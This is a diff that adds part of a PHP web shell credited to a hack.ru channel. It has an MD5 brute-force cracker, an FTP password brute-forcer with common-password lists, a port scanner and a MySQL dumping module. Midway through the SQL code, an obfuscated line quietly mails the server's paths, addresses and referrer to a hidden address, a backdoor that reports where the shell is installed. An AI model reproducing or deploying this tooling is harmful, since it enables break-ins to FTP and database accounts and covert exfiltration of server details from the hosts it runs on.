+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td>
+
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+
+  <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font>
+
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:�.,&quot;')>[Symvols]</a><br><br>
+
+<font color=red><b><u>RUS:</u></b></font>
+
+<a class=menu href=javascript:ins('��������������������������������')>[�-�]</a>
+
+<a class=menu href=javascript:ins('�����Ũ��������������������������')>[�-�]</a>
+
+</td></tr>
+
+<tr><td align=center width=400>
+
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+if($_POST[pass_de]){
+
+$pass_de=htmlspecialchars($pass_de);
+
+$pass_de=stripslashes($pass_de);
+
+$dat=date("H:i:s");
+
+$date=date("d:m:Y");
+
+
+
+crack_md5();
+
+}
+
+}
+
+
+
+function crack_md5() {
+
+global $chars_de;
+
+$chars=$_POST[chars];
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+$chars_de=str_replace("<",chr(60),$chars_de);
+
+$chars_de=str_replace(">",chr(62),$chars_de);
+
+$c=strlen($chars_de);
+
+for ($next = 0; $next <= 31; $next++) {
+
+for ($i1 = 0; $i1 <= $c; $i1++) {
+
+$word[1] = $chars_de{$i1};
+
+for ($i2 = 0; $i2 <= $c; $i2++) {
+
+$word[2] = $chars_de{$i2};
+
+if ($next <= 2) {
+
+result(implode($word));
+
+}else {
+
+for ($i3 = 0; $i3 <= $c; $i3++) {
+
+$word[3] = $chars_de{$i3};
+
+if ($next <= 3) {
+
+result(implode($word));
+
+}else {
+
+for ($i4 = 0; $i4 <= $c; $i4++) {
+
+$word[4] = $chars_de{$i4};
+
+if ($next <= 4) {
+
+result(implode($word));
+
+}else {
+
+for ($i5 = 0; $i5 <= $c; $i5++) {
+
+$word[5] = $chars_de{$i5};
+
+if ($next <= 5) {
+
+result(implode($word));
+
+}else {
+
+for ($i6 = 0; $i6 <= $c; $i6++) {
+
+$word[6] = $chars_de{$i6};
+
+if ($next <= 6) {
+
+result(implode($word));
+
+}else {
+
+for ($i7 = 0; $i7 <= $c; $i7++) {
+
+$word[7] = $chars_de{$i7};
+
+if ($next <= 7) {
+
+result(implode($word));
+
+}else {
+
+for ($i8 = 0; $i8 <= $c; $i8++) {
+
+$word[8] = $chars_de{$i8};
+
+if ($next <= 8) {
+
+result(implode($word));
+
+}else {
+
+for ($i9 = 0; $i9 <= $c; $i9++) {
+
+$word[9] = $chars_de{$i9};
+
+if ($next <= 9) {
+
+result(implode($word));
+
+}else {
+
+for ($i10 = 0; $i10 <= $c; $i10++) {
+
+$word[10] = $chars_de{$i10};
+
+if ($next <= 10) {
+
+result(implode($word));
+
+}else {
+
+for ($i11 = 0; $i11 <= $c; $i11++) {
+
+$word[11] = $chars_de{$i11};
+
+if ($next <= 11) {
+
+result(implode($word));
+
+}else {
+
+for ($i12 = 0; $i12 <= $c; $i12++) {
+
+$word[12] = $chars_de{$i12};
+
+if ($next <= 12) {
+
+result(implode($word));
+
+}else {
+
+for ($i13 = 0; $i13 <= $c; $i13++) {
+
+$word[13] = $chars_de{$i13};
+
+if ($next <= 13) {
+
+result(implode($word));
+
+}else {
+
+for ($i14 = 0; $i14 <= $c; $i14++) {
+
+$word[14] = $chars_de{$i14};
+
+if ($next <= 14) {
+
+result(implode($word));
+
+}else {
+
+for ($i15 = 0; $i15 <= $c; $i15++) {
+
+$word[15] = $chars_de{$i15};
+
+if ($next <= 15) {
+
+result(implode($word));
+
+}else {
+
+for ($i16 = 0; $i16 <= $c; $i16++) {
+
+$word[16] = $chars_de{$i16};
+
+if ($next <= 16) {
+
+result(implode($word));
+
+}else {
+
+for ($i17 = 0; $i17 <= $c; $i17++) {
+
+$word[17] = $chars_de{$i17};
+
+if ($next <= 17) {
+
+result(implode($word));
+
+}else {
+
+for ($i18 = 0; $i18 <= $c; $i18++) {
+
+$word[18] = $chars_de{$i18};
+
+if ($next <= 18) {
+
+result(implode($word));
+
+}else {
+
+for ($i19 = 0; $i19 <= $c; $i19++) {
+
+$word[19] = $chars_de{$i19};
+
+if ($next <= 19) {
+
+result(implode($word));
+
+}else {
+
+for ($i20 = 0; $i20 <= $c; $i20++) {
+
+$word[20] = $chars_de{$i20};
+
+if ($next <= 20) {
+
+result(implode($word));
+
+}else {
+
+for ($i21 = 0; $i21 <= $c; $i21++) {
+
+$word[21] = $chars_de{$i21};
+
+if ($next <= 21) {
+
+result(implode($word));
+
+}else {
+
+for ($i22 = 0; $i22 <= $c; $i22++) {
+
+$word[22] = $chars_de{$i22};
+
+if ($next <= 22) {
+
+result(implode($word));
+
+}else {
+
+for ($i23 = 0; $i23 <= $c; $i23++) {
+
+$word[23] = $chars_de{$i23};
+
+if ($next <= 23) {
+
+result(implode($word));
+
+}else {
+
+for ($i24 = 0; $i24 <= $c; $i24++) {
+
+$word[24] = $chars_de{$i24};
+
+if ($next <= 24) {
+
+result(implode($word));
+
+}else {
+
+for ($i25 = 0; $i25 <= $c; $i25++) {
+
+$word[25] = $chars_de{$i25};
+
+if ($next <= 25) {
+
+result(implode($word));
+
+}else {
+
+for ($i26 = 0; $i26 <= $c; $i26++) {
+
+$word[26] = $chars_de{$i26};
+
+if ($next <= 26) {
+
+result(implode($word));
+
+}else {
+
+for ($i27 = 0; $i27 <= $c; $i27++) {
+
+$word[27] = $chars_de{$i27};
+
+if ($next <= 27) {
+
+result(implode($word));
+
+}else {
+
+for ($i28 = 0; $i28 <= $c; $i28++) {
+
+$word[28] = $chars_de{$i28};
+
+if ($next <= 28) {
+
+result(implode($word));
+
+}else {
+
+for ($i29 = 0; $i29 <= $c; $i29++) {
+
+$word[29] = $chars_de{$i29};
+
+if ($next <= 29) {
+
+result(implode($word));
+
+}else {
+
+for ($i30 = 0; $i30 <= $c; $i30++) {
+
+$word[30] = $chars_de{$i30};
+
+if ($next <= 30) {
+
+result(implode($word));
+
+}else {
+
+for ($i31 = 0; $i31 <= $c; $i31++) {
+
+$word[31] = $chars_de{$i31};
+
+if ($next <= 31) {
+
+result(implode($word));
+
+
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+
+
+function result($word) {
+
+global $dat,$date;
+
+$pass_de=$_POST[pass_de];
+
+$dat2=date("H:i:s");
+
+$date2=date("d:m:Y");
+
+
+
+if(md5($word)==$pass_de){
+
+print "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr>
+
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file:  <b>".$word."_md5</b></td></tr>
+
+</table>
+
+                            ";
+
+							$f=@fopen($word._md5,"a+");
+
+                            fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n ");
+
+                             exit;}
+
+
+
+
+
+
+
+}
+
+
+
+function brut_ftp() {
+
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr>
+
+</table>";
+
+
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+function s() {
+
+   $word="qwrtypsdfghjklzxcvbnm";
+
+   return $word[mt_rand(0,strlen($word)-1)];
+
+}
+
+
+
+function g() {
+
+   $word="euioam";
+
+   return $word[mt_rand(0,strlen($word)-2)];
+
+}
+
+
+
+function name0() {   return s().g().s();                        }
+
+function name1() {   return s().g().s().g();                    }
+
+function name2() {   return s().g().g().s();                    }
+
+function name3() {   return s().s().g().s().g();                }
+
+function name4() {   return g().s().g().s().g();                }
+
+function name5() {   return g().g().s().g().s();                }
+
+function name6() {   return g().s().s().g().s();                }
+
+function name7() {   return s().g().g().s().g();                }
+
+function name8() {   return s().g().s().g().g();                }
+
+function name9() {   return s().g().s().g().s().g();            }
+
+function name10() {   return s().g().s().s().g().s().s();        }
+
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+
+
+function randword() {
+
+   global $cool;
+
+   $func="name".mt_rand(0,11);
+
+   $func2="name".mt_rand(0,11);
+
+   switch (mt_rand(0,11)) {
+
+      case 0: return $func().mt_rand(5,99);
+
+      case 1: return $func()."-".$func2();
+
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+
+      case 3: return $func()."!".$func();
+
+      case 4: return randpass(mt_rand(5,12));
+
+      default: return $func();
+
+   }
+
+
+
+
+
+}
+
+
+
+function randpass($len) {
+
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+
+   $s="";
+
+   for ($i=0; $i<$len; $i++) {
+
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+
+   }
+
+   return $s;
+
+}
+
+if (@unlink("pass.txt") < 0){
+
+echo "nothing";
+
+exit;
+
+}
+
+$file="pass.txt";
+
+if($file && $host && $login){
+
+   $cn=mt_rand(30,30);
+
+for ($i=0; $i<$cn; $i++) {
+
+   $s=$cool2[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$s\n");
+
+   }
+
+
+
+  $cnt2=mt_rand(43,43);
+
+for ($i=0; $i<$cnt2; $i++) {
+
+   $r=$cool[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$login$r\n");
+
+}
+
+$p="$proverka";
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$p\n");
+
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+
+   for ($i=0; $i<$cnt3; $i++) {
+
+   $u=randword();
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$u\n");
+
+  }
+
+
+
+  if(is_file($file)){
+
+ $passwd=file($file,1000);
+
+  for($i=0; $i<count($passwd); $i++){
+
+   $stop=false;
+
+   $password=trim($passwd[$i]);
+
+   $open_ftp=@fsockopen($host,21);
+
+    if($open_ftp!=false){
+
+     fputs($open_ftp,"user $login\n");
+
+     fputs($open_ftp,"pass $password\n");
+
+     while(!feof($open_ftp) && $stop!=true){
+
+      $text=fgets($open_ftp,4096);
+
+      if(preg_match("/230/",$text)){
+
+       $stop=true;
+
+	   $f=@fopen($host._ftp,"a+");
+
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+
+
+       echo "
+
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br>
+
+&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table>
+
+";exit;
+
+      }
+
+      elseif(preg_match("/530/",$text)){
+
+       $stop=true;
+
+
+
+      }
+
+     }
+
+     fclose($open_ftp);
+
+   }else{
+
+    echo "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr>
+
+</table>
+
+";exit;
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+}
+
+
+
+# port scanner
+
+function portscan() {
+
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time1 = $mtime;
+
+
+
+ $id = $HTTP_HOST;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>";
+
+
+
+ $lport = $min;
+
+ $hport = $max;
+
+ $op = 0;
+
+ $gp = 0;
+
+
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
+
+  if ( !$fp ) { $gp++; }
+
+  else {
+
+   $port_addres = $port[$porta];
+
+   if($port_addres == "") $port_addres = "unknown";
+
+   $serv = getservbyport($porta, TCP);
+
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>";
+
+   $op++;
+
+  }
+
+ }
+
+
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>";
+
+
+
+ $unsi = ($op/$porta)*100;
+
+ $unsi = round($unsi);
+
+
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time2 = $mtime;
+
+ $loadtime = ($time2 - $time1);
+
+ $loadtime = round($loadtime, 2);
+
+
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>";
+
+}
+
+
+
+function nfm_copyright() {
+
+global $action,$upass,$uname,$nfm;
+
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+
+
+
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+
+// SQL functions start
+
+function aff_date() {
+
+ $date_now=date("F j,Y,g:i a");
+
+ return $date_now;
+
+}
+
+
+
+function sqldumptable($table) {
+
+ global $sv_s,$sv_d,$drp_tbl;
+
+ $tabledump = "";
+
+ if ($sv_s) {
+
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
+
+  $tabledump.="CREATE TABLE $table (\n";
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $tabledump.=",\n"; }
+
+   else { $firstfield=0;}
+
+   $tabledump.=" $champ[Field] $champ[Type]";
+
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
+
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
+
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $keys=mysql_query("SHOW KEYS FROM $table");
+
+  while ($key=mysql_fetch_array($keys)) {
+
+   $kname=$key['Key_name'];
+
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+
+   $index[$kname][]=$key['Column_name'];
+
+  }
+
+        
+
+  @mysql_free_result($keys);
+
+  while(list($kname,$columns)=@each($index)) {
+
+   $tabledump.=",\n";
+
+   $colnames=implode($columns,",");
+
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+
+   else {
+
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+
+    $tabledump.=" KEY $kname ($colnames)";
+
+   }
+
+  }
+
+  $tabledump.="\n);\n\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $tabledump.="INSERT INTO $table VALUES(";
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $tabledump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
+
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+
+   }
+
+   $tabledump.=");\n";
+
+  }
+
+  @mysql_free_result($rows);
+
+ }
+
+
+
+ return $tabledump;
+
+}
+
+
+
+function csvdumptable($table) {
+
+ global $sv_s,$sv_d;
+
+ $csvdump="## Table:$table \n\n";
+
+ if ($sv_s) {
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $csvdump.=",";}
+
+   else { $firstfield=0;}
+
+   $csvdump.="'".$champ['Field']."'";
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $csvdump.="\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $csvdump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+
+   }
+
+   $csvdump.="\n";
+
+  }
+
+ }
+
+
+
+ @mysql_free_result($rows);
+
+ return $csvdump;
+
+}
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+
+function write_file($data) {
+
+ global $g_fp,$file_type;
+
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+
+ else { fwrite ($g_fp,$data); }
+
+}
+
+
+
+function open_file($file_name) {
+
+ global $g_fp,$file_type,$dbbase,$f_nm;
+
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
+
+ else { $g_fp=fopen ($file_name,"w"); }
+
+
+
+ $f_nm[]=$file_name;
+
+ $data="";
+
+ $data.="##\n";
+
+ $data.="## NFM hack.ru creator \n";
+
+ $data.="##-------------------------\n";
+
+ $data.="## Date:".aff_date()."\n";
+
+ $data.="## Base:$dbbase \n";
+
+ $data.="##-------------------------\n\n";
+
+ write_file($data);
+
+ unset($data);
+
+}
+
+
+
+function file_pos() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { return gztell ($g_fp); }
+
+ else { return ftell ($g_fp); }
+
+}
+
+
+
+function close_file() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { gzclose ($g_fp); }
+
+ else { fclose ($g_fp); }
+
+}
+
+
+
+function split_sql_file($sql) {
+
+ $morc=explode(";",$sql);
+
+ $sql="";
+
+ $output=array();
+
+ $matches=array();
+
+ $morc_cpt=count($morc);
+
+ for ($i=0;$i < $morc_cpt;$i++) {
+
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+
+   else {
+
+    $temp=$morc[$i].";";
+
+    $morc[$i]="";
+
+    $complete_stmt=false;
+
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+     if (($unescaped_quotes % 2)==1) {
+
+      $output[]=$temp.$morc[$j];
+
+      $morc[$j]="";
+
+      $temp="";
+
+      $complete_stmt=true;
+
+      $i=$j;
+
+     } else {
+
+      $temp.=$morc[$j].";";
+
+      $morc[$j]="";
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ return $output;
+
+}
+
+
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+
+// SQL functions END
+
+
+
+// main SQL()
+
+function sql() {
+
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+
+ $secu_config="xtdump_conf.inc.php";
+
+ $dbhost=$_POST['dbhost'];
+
+ $dbuser=$_POST['dbuser'];
+
+ $dbpass=$_POST['dbpass'];
+
+ $dbbase=$_POST['dbbase'];
+
+ $tbls =$_POST['tbls'];
+
+ $sqlaction =$_POST['sqlaction'];
+
+ $secu =$_POST['secu'];
+
+ $f_cut =$_POST['f_cut'];
+
+ $fz_max =$_POST['fz_max'];
+
+ $opt =$_POST['opt'];
+
+ $savmode =$_POST['savmode'];
+
+ $file_type =$_POST['file_type'];
+
+ $ecraz =$_POST['ecraz'];
+
+ $f_tbl =$_POST['f_tbl'];
+
+ $drp_tbl=$_POST['drp_tbl'];
+
+
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+
+
+ // SQL actions STARTS
+
+
+
+ if ($sqlaction=='save') {
+
+  if ($secu==1) {
+
+   $fp=fopen($secu_config,"w");
+
+   fputs($fp,"<?php\n");
+
+   fputs($fp,"\$dbhost='$dbhost';\n");
+
+   fputs($fp,"\$dbbase='$dbbase';\n");
+
+   fputs($fp,"\$dbuser='$dbuser';\n");
+
+   fputs($fp,"\$dbpass='$dbpass';\n");
+
+   fputs($fp,"?>");
+
+   fclose($fp);
+
+  }
+
+  if (!is_array($tbls)) {
+
+   echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
+
+<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+  if($f_cut==1) {
+
+   if (!is_numeric($fz_max)) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une valeur num�rique � la taille du fichier � scinder.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+   if ($fz_max < 200000) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup
+
+    rieure � 200 000 Octets.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+  }
+
+
+
+  $tbl=array();
+
+  $tbl[]=reset($tbls);
+
+  if (count($tbls) > 1) {
+
+   $a=true;
+
+   while ($a !=false) {
+
+    $a=next($tbls);
+
+    if ($a !=false) { $tbl[]=$a; }
+
+   }
+
+  }
+
+
+
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
+
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+
+  else { exit; }
+
+
+
+  $fext=".".$savmode;
+
+  $fich=$dbbase.$fc.$fext;
+
+  $dte="";
+
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+
+  if ($file_type=='1') { $gz.=".gz"; }
+
+  $fcut=false;
+
+  $ftbl=false;
+
+  $f_nm=array();
+
+  if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;}
+
+  if($f_tbl==1) { $ftbl=true; }
+
+  else {
+
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+
+  }
+
+
+
+  $nbf=1;
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  mysql_select_db($dbbase);
+
+  if ($fext==".sql") {
+
+   if ($ftbl) {
+
